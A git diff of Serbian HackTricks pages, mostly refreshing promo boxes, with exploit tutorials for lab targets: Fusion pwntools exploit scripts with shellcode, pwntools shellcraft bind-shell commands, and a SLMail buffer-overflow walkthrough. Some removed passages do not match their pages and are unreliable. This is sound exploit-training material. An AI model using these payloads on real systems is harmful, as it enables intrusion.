Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index b51d93bd3..d900dfdc4 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Ako na neki način možete šifrovati plaintext koristeći RC4, možete dešifrovati bilo koji sadržaj koji je šifrovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju šifrovanja. +Ako na neki način možete šifrovati tekst pomoću RC4, možete dešifrovati bilo koji sadržaj šifrovan tim RC4 (koristeći istu lozinku) samo koristeći funkciju šifrovanja. -Ako možete šifrovati poznati plaintext, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: +Ako možete šifrovati poznati tekst, takođe možete izvući lozinku. Više referenci možete pronaći na HTB Kryptos mašini: {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} @@ -25,16 +26,17 @@ Ako možete šifrovati poznati plaintext, takođe možete izvući lozinku. Više +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/emails-vulns.md b/emails-vulns.md index 664d216e6..8969cb5c0 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -1,33 +1,20 @@ # Vulnerabilnosti e-pošte +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks-u -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## ## - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index bf921e258..d845fa855 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,24 +1,25 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Level00 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Dobijte offset za modifikaciju EIP-a -2. Stavite adresu shell koda u EIP +1. Dobijanje offseta za modifikaciju EIP-a +2. Stavljanje adrese shell koda u EIP ```python from pwn import * @@ -45,53 +46,6 @@ r.send(buf) r.interactive() ``` # Nivo01 - -## Opis - -U ovom nivou, cilj je da se iskoristi ranjivost u programu `fusion` kako bi se dobio pristup nalogu `level02`. - -## Fajlovi - -- `/home/level01/fusion` - -## Rešenje - -Program `fusion` je setuid binarni fajl koji se izvršava sa privilegijama korisnika `level02`. Kada se pokrene, program traži unos korisničkog imena i lozinke. Ako se unese ispravno korisničko ime i lozinka, program će prikazati poruku "Logged in!" i završiti sa izvršavanjem. - -Da bismo iskoristili ovu ranjivost, treba da pronađemo način da zaobiđemo proveru lozinke i dobijemo pristup nalogu `level02`. - -Jedan način da se to postigne je da se izmeni vrednost promenljive okruženja `PATH` kako bi se program `fusion` pokrenuo sa drugim programom koji će zaobići proveru lozinke. Na primer, možemo kreirati skriptu `getflag` koja će prikazati sadržaj fajla `/home/level02/.pass` i postaviti je na putanju koja je pre `fusion` u promenljivoj `PATH`. - -Evo kako to možemo uraditi: - -1. Kreirajte skriptu `getflag` sa sledećim sadržajem: - -```bash -#!/bin/bash -cat /home/level02/.pass -``` - -2. Postavite prava izvršavanja na skriptu: - -```bash -chmod +x getflag -``` - -3. Izmenite promenljivu okruženja `PATH` tako da putanja do skripte `getflag` bude pre `fusion`: - -```bash -export PATH=/home/level01:$PATH -``` - -4. Pokrenite program `fusion`: - -```bash -./fusion -``` - -5. Unesite bilo koje korisničko ime i pritisnite Enter kada se traži lozinka. - -Program `fusion` će sada pokrenuti skriptu `getflag` umesto provere lozinke i prikazaće sadržaj fajla `/home/level02/.pass`, koji je lozinka za nalog `level02`. ```python from pwn import * @@ -117,16 +71,17 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 542ba33f0..34540f1bf 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,36 +1,37 @@ +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ``` pip3 install pwntools ``` # Pwn asm -Dobijanje opkoda sa linije ili iz fajla. +Dobij opkodove sa linije ili iz fajla. ``` pwn asm "jmp esp" pwn asm -i ``` -**Može se izabrati:** +**Može izabrati:** -* vrsta izlaza (sirovi, heksadecimalni, string, elf) -* kontekst izlazne datoteke (16,32,64,linux,windows...) -* izbegavanje bajtova (novih linija, nula, lista) -* izbor enkodera za debagovanje shell koda koristeći gdb za pokretanje izlaza +* tip izlaza (sirovi, heksadecimalni, string, elf) +* kontekst datoteke izlaza (16,32,64,linux,windows...) +* izbegavanje bajtova (novi redovi, nula, lista) +* izbor enkodera za debagovanje shell koda korišćenjem gdb pokreni izlaz -# **Pwn checksec** +# **Pwn checksec** -Skripta za proveru sigurnosti +Skripta Checksec ``` pwn checksec ``` @@ -43,41 +44,41 @@ Dobijanje obrasca pwn cyclic 3000 pwn cyclic -l faad ``` -**Može se izabrati:** +**Može izabrati:** -* Korišćena abeceda (podrazumevano su mala slova) +* Korišćeni alfabet (podrazumevano mala slova) * Dužina jedinstvenog obrasca (podrazumevano 4) * Kontekst (16,32,64,linux,windows...) -* Uzeti ofset (-l) +* Uzmi ofset (-l) # Pwn debug -Povežite GDB sa procesom +Poveži GDB sa procesom ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` -**Može se izabrati:** +**Može izabrati:** * Po izvršnom fajlu, po imenu ili po pid kontekstu (16,32,64,linux,windows...) -* gdbscript za izvršavanje -* sysrootpath +* gdbskript za izvršenje +* putanja do sysroota -# Onemogući nx za binarni fajl +# Onemogući nx + +Onemogući nx binarnog fajla ``` pwn disablenx ``` -# Pwn disasm - -Disasemblirovanje heksadecimalnih opkoda +# Rastavljanje disasemblovanih heksadecimalnih operacija ``` pwn disasm ffe4 ``` -**Može se izabrati:** +**Može izabrati:** * kontekst (16,32,64,linux,windows...) -* bazna adresa +* osnovna adresa * boja (podrazumevano)/bez boje # Pwn elfdiff @@ -86,7 +87,7 @@ Ispisuje razlike između 2 fajla ``` pwn elfdiff ``` -# Pwn heks +# Hakuj heks Dobijanje heksadecimalne reprezentacije ```bash @@ -94,15 +95,15 @@ pwn hex hola #Get hex of "hola" ascii ``` # Pwn doktorat -Dobijanje heksadecimalnog prikaza (hexdump) +Dobij hexdump ``` pwn phd ``` -**Možete izabrati:** +**Može izabrati:** * Broj bajtova za prikazivanje * Broj bajtova po liniji za isticanje bajta -* Preskočiti bajtove na početku +* Preskoči bajtove na početku # Pwn pwnstrip @@ -110,7 +111,7 @@ pwn phd # Pwn shellcraft -Dobijanje shellkodova +Dobij shell kodove ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name @@ -118,32 +119,32 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` -**Može se izabrati:** +**Može izabrati:** -* shellcode i argumenti za shellcode -* Izlazna datoteka -* Format izlaza -* Debug (povezivanje dbg sa shellcode-om) -* Pre (debug zamka pre koda) -* Posle -* Izbegavaj korišćenje opkoda (podrazumevano: nije null i nova linija) +* shellcode i argumente za shellcode +* Izlaznu datoteku +* format izlaza +* debug (poveži dbg sa shellcode-om) +* pre (debug zamka pre koda) +* posle +* izbegavaj korišćenje opkoda (podrazumevano: ne nula i nova linija) * Pokreni shellcode * Boja/bez boje -* Lista sistemskih poziva -* Lista mogućih shellcode-ova +* lista sistemskih poziva +* lista mogućih shellcode-ova * Generiši ELF kao deljivu biblioteku # Pwn šablon -Dobijte Python šablon +Dobij python šablon ``` pwn template ``` -**Može izabrati:** host, port, user, pass, path i quiet +**Može izabrati:** host, port, korisnik, lozinka, putanja i tiho # Pwn unhex -Od heksadekadnog broja u string +Od heksadekadnog u string ``` pwn unhex 686f6c61 ``` @@ -153,16 +154,17 @@ Da biste ažurirali pwntools ``` pwn update ``` +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 52a31740e..e2a44d7d8 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,57 +1,31 @@ -# Windows Exploiting (Osnovni vodič - OSCP nivo) +# Windows Exploiting (Osnovni vodič - nivo OSCP) + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -## **Počnite instaliranjem SLMail servisa** +## **Počnite instalaciju SLMail servisa** -## Restartujte SLMail servis +## Ponovno pokretanje SLMail servisa -Svaki put kada trebate **restartovati SLMail servis**, to možete uraditi koristeći Windows konzolu: +Svaki put kada treba **ponovo pokrenuti servis SLMail** to možete uraditi koristeći Windows konzolu: ``` net start slmail ``` ![](<../.gitbook/assets/image (23) (1).png>) ## Veoma osnovni Python šablon za eksploataciju - -```python -#!/usr/bin/env python3 - -import socket - -# Definišite ciljnu IP adresu i port -target_ip = "192.168.1.100" -target_port = 1337 - -# Kreirajte TCP soket -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - -# Povežite se sa ciljnom IP adresom i portom -s.connect((target_ip, target_port)) - -# Pošaljite eksploatacijski kod ciljnom sistemu -payload = b"AAAAAABBBBBBCCCCC" -s.send(payload) - -# Zatvorite soket -s.close() -``` - -Ovaj Python šablon predstavlja veoma osnovnu strukturu za izradu eksploatacijskog koda. Prvo definišemo ciljnu IP adresu i port, zatim kreiramo TCP soket i povezujemo se sa ciljnim sistemom. Nakon toga, šaljemo eksploatacijski kod ciljnom sistemu i zatvaramo soket. - -Napomena: Ovaj šablon je veoma osnovan i treba ga prilagoditi specifičnostima ciljnog sistema i eksploatacijske tehnike koju želite da primenite. ```python #!/usr/bin/python @@ -73,11 +47,11 @@ print "\nFinished!." except: print "Could not connect to "+ip+":"+port ``` -## **Promena fonta u Immunity Debugger-u** +## **Promenite font Immunity Debugger-a** Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` -## **Povezivanje procesa sa Immunity Debugger-om:** +## **Povežite proces sa Immunity Debugger-om:** **File --> Attach** @@ -85,27 +59,27 @@ Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK` **I pritisnite dugme START** -## **Slanje exploit-a i provera da li je EIP pogođen:** +## **Pošaljite eksploit i proverite da li je EIP pogođen:** ![](<../.gitbook/assets/image (25) (1) (1).png>) -Svaki put kada prekinete servis, trebali biste ga ponovo pokrenuti, kako je naznačeno na početku ove stranice. +Svaki put kada prekinete servis, trebalo bi da ga ponovo pokrenete kako je naznačeno na početku ove stranice. -## Kreiranje obrasca za modifikaciju EIP-a +## Kreirajte šablon za modifikaciju EIP-a -Obrazac treba biti veličine bafera koji ste prethodno koristili za prekid servisa. +Šablon bi trebalo da bude velik kao bafer koji ste koristili da prekinete servis ranije. ![](<../.gitbook/assets/image (26) (1) (1).png>) ``` /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` -Promenite bafer eksploita i postavite šablon i pokrenite eksploit. +Promenite bafer eksploatacije i postavite obrazac, zatim pokrenite eksploataciju. -Treba da se pojavi novi pad sistema, ali sa drugačijom EIP adresom: +Treba da se pojavi novi pad, ali sa drugačijom EIP adresom: ![](<../.gitbook/assets/image (27) (1) (1).png>) -Proverite da li se adresa nalazi u vašem šablonu: +Proverite da li se adresa nalazi u vašem obrascu: ![](<../.gitbook/assets/image (28) (1) (1).png>) ``` @@ -113,11 +87,11 @@ Proverite da li se adresa nalazi u vašem šablonu: ``` Izgleda da **možemo izmeniti EIP na offsetu 2606** bafera. -Proverite to izmenom bafera eksploita: +Proverite to modifikujući bafer exploita: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` -Sa ovim baferom, EIP bi trebao da se sruši i pokazuje na 42424242 ("BBBB") +Sa ovim baferom EIP koji je pao treba da pokazuje na 42424242 ("BBBB") ![](<../.gitbook/assets/image (30) (1) (1).png>) @@ -125,21 +99,21 @@ Sa ovim baferom, EIP bi trebao da se sruši i pokazuje na 42424242 ("BBBB") Izgleda da radi. -## Provera za Shellcode prostor unutar steka +## Provera prostora za Shellcode unutar steka 600B bi trebalo da bude dovoljno za bilo koji moćan shellcode. -Hajde da promenimo bafer: +Promenimo bafer: ``` buffer = 'A'*2606 + 'BBBB' + 'C'*600 ``` -Pokrenite novi exploit i proverite EBP i dužinu korisnog shell koda. +Pokrenite novi exploit i proverite EBP i dužinu korisnog shell koda ![](<../.gitbook/assets/image (31) (1).png>) ![](<../.gitbook/assets/image (32) (1).png>) -Možete videti da kada se dostigne ranjivost, EBP pokazuje na shell kod i da imamo puno prostora da lociramo shell kod ovde. +Možete primetiti da kada se dostigne ranjivost, EBP pokazuje na shell kod i da imamo puno prostora da lociramo shell kod ovde. U ovom slučaju imamo **od 0x0209A128 do 0x0209A2D6 = 430B.** Dovoljno. @@ -167,27 +141,27 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` -Loši karakteri počinju od 0x01 jer je 0x00 gotovo uvek loš. +Badchars počinju od 0x01 jer je 0x00 gotovo uvek loš. -Izvršite ponovno eksploataciju sa ovim novim baferom izbacujući karaktere koji su se pokazali beskorisnim:. +Izvršite ponovo eksploataciju sa ovim novim baferom, izbacujući karaktere koji su se pokazali kao beskorisni:. Na primer: -U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa nije sačuvano u memoriji od karaktera 0x09). +U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa nije sačuvano u memoriji jer je karakter 0x09). ![](<../.gitbook/assets/image (33) (1).png>) -U ovom slučaju možete videti da **se karakter 0x0D izbegava**: +U ovom slučaju možete videti da **je karakter 0x0D izbegnut**: ![](<../.gitbook/assets/image (34) (1).png>) -## Pronalaženje JMP ESP kao povratne adrese +## Pronađite JMP ESP kao povratnu adresu Koristeći: ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` -**Prikazaćete mape memorije**. Potražite neki DLL koji ima: +Morate **navesti mape memorije**. Potražite neki DLl koji ima: * **Rebase: False** * **SafeSEH: False** @@ -197,25 +171,25 @@ Koristeći: ![](<../.gitbook/assets/image (35) (1).png>) -Sada, unutar ove memorije trebali biste pronaći neke bajtove JMP ESP, da biste to uradili 